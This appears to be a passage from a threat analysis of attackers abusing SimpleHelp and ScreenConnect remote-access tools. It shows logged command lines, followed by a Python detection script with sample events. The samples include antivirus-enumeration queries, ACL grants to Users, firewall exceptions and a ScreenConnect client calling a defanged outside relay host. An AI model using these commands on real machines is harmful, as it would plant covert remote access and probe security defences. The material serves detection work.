wmic.exe Remote Access.exe wmic.exe /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get
wmic.exe Remote Access.exe wmic.exe /namespace:\\root\SecurityCenter2 PATH AntiSpywareProduct get
winpty-agent64.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\winpty-agent64.exe” \\.\pipe\winpty-14832-1-control \\.\pipe\winpty-14832-1-data 80 40
winpty-agent64.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\winpty-agent64.exe” \\.\pipe\winpty-2044-1-control \\.\pipe\winpty-2044-1-data 80 40
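As an added triage example (not code from the Securonix report), the following Python turns the behaviours visible in the process tree above into detection rules and runs them over constructed process-creation records shaped like those rows: firewall exceptions under the JWrapper root, cacls granting Users full control there, SecurityCenter2 product enumeration, SimpleService installing the gateway service, and a ScreenConnect client pointed at a relay outside an allowlist. The record layout, rule names and the allowlisted relay host are assumptions.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    process: str  # image name of the created process
    parent: str   # image name of the parent process
    cmdline: str  # full command line as logged

# Install root of the JWrapper-packaged SimpleHelp build seen in the table.
JWRAPPER_ROOT = r"c:\programdata\jwrapper-remote access"
# Relay hosts the organisation legitimately uses (placeholder value, assumption).
KNOWN_SC_RELAYS = {"rmm.example.internal"}
SC_HOST = re.compile(r'[?&]h=([^&"\s]+)')

def fw_allow_jwrapper(e: ProcEvent) -> bool:
    """netsh opening firewall exceptions for binaries under the JWrapper root."""
    c = e.cmdline.lower()
    return (e.process.lower() == "netsh.exe"
            and "firewall add allowedprogram" in c and JWRAPPER_ROOT in c)

def cacls_users_full(e: ProcEvent) -> bool:
    """cacls granting the Users group full control inside the JWrapper tree."""
    c = e.cmdline.lower()
    return (e.process.lower() == "cacls.exe" and JWRAPPER_ROOT in c
            and re.search(r'/[gp]\s+"?users"?:f\b', c) is not None)

def security_product_enum(e: ProcEvent) -> bool:
    """WMI SecurityCenter2 queries for AV, anti-spyware or firewall products."""
    c = e.cmdline.lower()
    return "root\\securitycenter2" in c and any(
        p in c for p in ("antivirusproduct", "antispywareproduct", "firewallproduct"))

def screenconnect_unknown_relay(e: ProcEvent) -> bool:
    """ScreenConnect client service pointed at a relay host not on the allowlist."""
    if e.process.lower() != "screenconnect.clientservice.exe":
        return False
    m = SC_HOST.search(e.cmdline)
    # The table defangs the host as "[.]"; normalise before the allowlist check.
    return bool(m) and m.group(1).replace("[.]", ".").lower() not in KNOWN_SC_RELAYS

def simpleservice_install(e: ProcEvent) -> bool:
    """SimpleService.exe registering the gateway service from the JWrapper tree."""
    c = e.cmdline.lower()
    return e.process.lower() == "simpleservice.exe" and "-install" in c and JWRAPPER_ROOT in c

RULES = {f.__name__: f for f in (fw_allow_jwrapper, cacls_users_full, security_product_enum,
                                 screenconnect_unknown_relay, simpleservice_install)}

def scan(events):
    """Map each rule that fired to the command lines that triggered it."""
    hits = {}
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.setdefault(name, []).append(e.cmdline)
    return hits

def verdict(events) -> str:
    """'dual_rmm' when SimpleHelp-side and ScreenConnect-side rules both fire."""
    fired = set(scan(events))
    simplehelp = bool(fired & {"fw_allow_jwrapper", "cacls_users_full", "simpleservice_install"})
    screenconnect = "screenconnect_unknown_relay" in fired
    if simplehelp and screenconnect:
        return "dual_rmm"
    return "single_rmm" if (simplehelp or screenconnect) else "clean"

# Constructed records, shaped after rows of the process tree above (key blob omitted).
SAMPLE_EVENTS = [
    ProcEvent("netsh.exe", "Remote Access.exe", r'netsh.exe firewall add allowedprogram "C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\java.exe" "SHRemoteAccessServiceJE_2" ENABLE'),
    ProcEvent("cacls.exe", "statement5648.exe", r'cacls "C:\ProgramData\JWrapper-Remote Access\logs" /e /g "Users":F'),
    ProcEvent("wmic.exe", "Remote Access.exe", r"wmic.exe /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get"),
    ProcEvent("ScreenConnect.ClientService.exe", "services.exe", r'"C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sslzeromail[.]run.place&p=8041&k=[key omitted]&c=crypto"'),
    ProcEvent("SimpleService.exe", "Remote Access.exe", r'"C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe" -install "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\simplegateway.service"'),
    # Two records that must not fire: an ACL edit outside the RMM tree and a plain status query.
    ProcEvent("cacls.exe", "explorer.exe", r'cacls "C:\Users\Public\notes.txt" /e /g "Users":F'),
    ProcEvent("netsh.exe", "cmd.exe", "netsh advfirewall show all State"),
]

if __name__ == "__main__":
    for name, lines in scan(SAMPLE_EVENTS).items():
        print(f"{name}: {len(lines)} hit(s)")
    print("verdict:", verdict(SAMPLE_EVENTS))
```

On the sample records the verdict is `dual_rmm`, because both the SimpleHelp-side rules and the ScreenConnect relay rule fire; the two benign records produce no hits.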